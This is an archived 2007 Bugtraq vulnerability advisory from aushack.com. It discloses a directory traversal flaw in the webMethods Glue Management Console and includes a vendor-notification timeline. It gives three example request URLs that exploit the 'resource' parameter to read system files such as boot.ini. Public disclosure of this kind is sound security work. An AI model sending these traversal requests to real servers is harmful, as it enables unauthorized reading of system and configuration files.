webMethods Glue Management Console Directory Traversal
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: webMethods Glue Management Console Directory Traversal
- From: "Patrick Webster" <patrick@xxxxxxxxxxx>
- Date: Wed, 11 Apr 2007 21:31:00 +1000
- Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; b=NFkG2hx2iLi4lO7KPcwYMVkBEW82daq1XmGSWzkqi5prnlkxmVRBIk5J83HXoNwa04n8MHefy/IV/7pMmLeb1mFw96rxrtoLf6/9SWJJoabmAdmKle4BAxoWgzmzfYWqu7770Wv3dKYzHp+jDvDWNW8KNcAMfSoyKUGOM/KdL2E=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; b=XKom4eU6xho/krtcVPoeRl4zCWn5MGGnPqdYB46exzEvGAsR+bDCGBiQqg+lrUbQLgOzCIzcmDqRgKn7pBsveImNxv4VhXWwnkbCCQT3Bd9DFnkRL6oVhgGTJuEtpD26Mrj3bl2RqOkPkqWscOUy3gs8b9E8sq5j4WCKr1uBVSo=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
- Sender: aushack@xxxxxxxxx
aushack.com - Vulnerability Advisory
-----------------------------------------------
Release Date:
11-Apr-2007
Software:
webMethods - webMethods Glue Management Console
http://www.webmethods.com/
"With webMethods Glue developers can easily create SOAP interfaces
for their existing Java and C/C++ applications, and legacy systems
can be easily Web service-enabled, allowing reuse. webMethods Glue
includes a compact, high-performance implementation of important
standards such as HTTP, Servlets, XML, SOAP, WSDL, and UDDI, and
interoperates with Microsoft .NET, IBM WebSphere, BEA WebLogic,
Apache Axis, and other Web service platforms."
Versions affected:
Glue 6.5.1 and below.
Vulnerability discovered:
Directory Traversal.
Vulnerability impact:
Medium - Read arbitrary system files.
Vulnerability information:
The webMethods Glue Management Console includes HTML pages via
the /console?resource=console/index.html variable, which is prone
to a classic traversal attack.
Examples:
http://glueconsole:8080/console?resource=../../../boot.ini
http://glueconsole:8080/console?resource=\boot.ini
http://glueconsole:8080/console?resource=c:\boot.ini
Would return the contents of the 'boot.ini' file.
Note that 'c:\boot.ini' is also valid. It may be possible
(but untested) to traverse other volumes.
References:
aushack.com advisory
http://www.aushack.com/advisories/200704-webmethods.txt
Credit:
Patrick Webster ( patrick@xxxxxxxxxxx )
Disclosure timeline:
20-Mar-2007 - Discovered during quick audit.
23-Mar-2007 - Vendor notified. No response.
11-Apr-2007 - Public disclosure.
EOF